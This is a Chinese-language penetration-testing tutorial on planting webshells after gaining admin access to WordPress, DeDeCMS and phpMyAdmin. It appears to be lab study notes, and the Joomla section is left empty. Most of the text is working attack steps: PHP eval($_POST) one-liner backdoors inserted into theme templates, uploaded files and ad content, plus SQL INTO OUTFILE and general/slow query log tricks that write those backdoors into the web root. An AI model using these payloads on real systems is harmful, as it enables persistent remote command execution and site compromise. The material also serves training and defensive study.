概述
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后寻找后台漏洞上传 网页后门,获取网站的webshell;
一:WordPress
WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统。WordPress具 有插件架构和模板系统。截至2018年4月,排名前1000万的网站中超过30.6%使用WordPress。 WordPress是最受欢迎的网站内容管理系统。全球有大约30%的网站(7亿5000个)都是使用 WordPress架设网站的。WordPress是目前因特网上最流行的博客系统。WordPress在最著名的网 络发布阶段中脱颖而出。如今,它被使用在超过7000万个站点上。
后台修改模板拿WebShell
站点搭建之后进行安装 基础信息随便写,然后登录
进入后台当中 》外观》编辑选项》404.php
写入一句话木马 <?php phpinfo();eval($_POST['cmd']);?> 更新
访问以下连接即可获取WebShell…
#拼接路径 /wp-content/themes/twentyfifteen/404.php
#访问连接 http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php 可连
上传主题拿WebShell
步骤一:接着上一个环境使用…将带有后门的文件加入到主题中并将主题压缩为ZIP文件…点击【外观】–》【主题】–》【添加】–》》【上传主题】–》【浏览】–》【现在安装】
主题文件: shell.zip
连接
http://ip:8080/wp-content/themes/shell/cmd.php
- kali自带工具 wpscan
二:DeDeCMS
DedeCMS是织梦团队开发PHP 网站管理系统,它以简单、易用、高效为特色,组建出各种各样各 具特色的网站,如地方门户、行业门户、政府及企事业站点等
通过文件管理器上传WebShell
步骤一:访问目标靶场其思路为dedecms后台可以直接上传任意文件,可以通过文件管理器上传php文件 获取webshell…
后台:http://127.0.0.1/DedeCMS/uploads/dede/index.php
#信息 :自己设置的 比如我设置的
username:admin
password:123456
步骤二:登陆到后台点击 【核心】–》 【文件式管理器】–》 【文件上传】将准备好的一句话代码上传…OK
步骤三:访问上传成功后的文件并连接测试…
地址:http://127.0.0.1/DedeCMS/uploads/uploads/shell.php
修改模板文件拿WebShell
步骤一:与WPCMS类似,直接修改模板拿WebShell…点击 【模板】–》 【默认模板管理】–》 【index.htm】–> 【修改】在文件修改中添加一句话代码…如下
步骤二:点击【生成】–》【更新主页HTML】–》将主页位置修改为【…/index.php】–》点击【生成静态】–》点击【更新主页】再次访问站点首页可发现变化.
连接测试.
#地址 http://127.0.0.1/DedeCMS/uploads/index.php
后台任意命令执行拿WebShell
步骤一:点击【模块】–》【广告管理】–》【增加一个新广告】–》在【广告内容】处添加一句话代码–》点击【确定】
连接测试
三、Joomla未授权访问漏洞(CVE-2023-23752)
四:PhPMyadmin
PHPMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理 数据库。
into outfile写马
select @@basedir; 查找mysql安装路径
show global variables like ‘%secure_file_priv%’;
select '<?php @eval($_POST[a]);?>'INTO OUTFILE ‘E:/phpstudy_pro/www/644.php’
开启日志写马getshell
SHOw VARIABLES LIKE ‘general%’; # 查看general_log 是否开启
set global general_log = “oN”;#开启
set global general_log_file=‘E:/phpstudy_pro/www/456.php’;
select ‘<?php eval($_POST["aaa"]);?>’;
测试:
127.0.0.1/456.php
慢查询we bshell
show variables like ‘%slow%’
set global slow_query_log=on;
set global slow_query_log_file=‘E:/phpstudy_pro/WWW/slow.php’ select '<?php eval($_POST["pwd"]);?>
select ‘<?php phpinfo();?>’ or sleep(30); 间隔30秒
创建数据库和表写入webshell
建库 建表
插入数据 一句话木马
CREATE TABLE test( id text(500) not null);
INSERT INTO test (id) VALUES(‘<?php @eval($_POST[cmd]);?>’);
SELECT id FROM len INTO OUTFILE ‘E:/phpstudy_pro/WWW/300.php’;
DROP TABLE IF EXISTS test;
phpinfo()
待 补充完善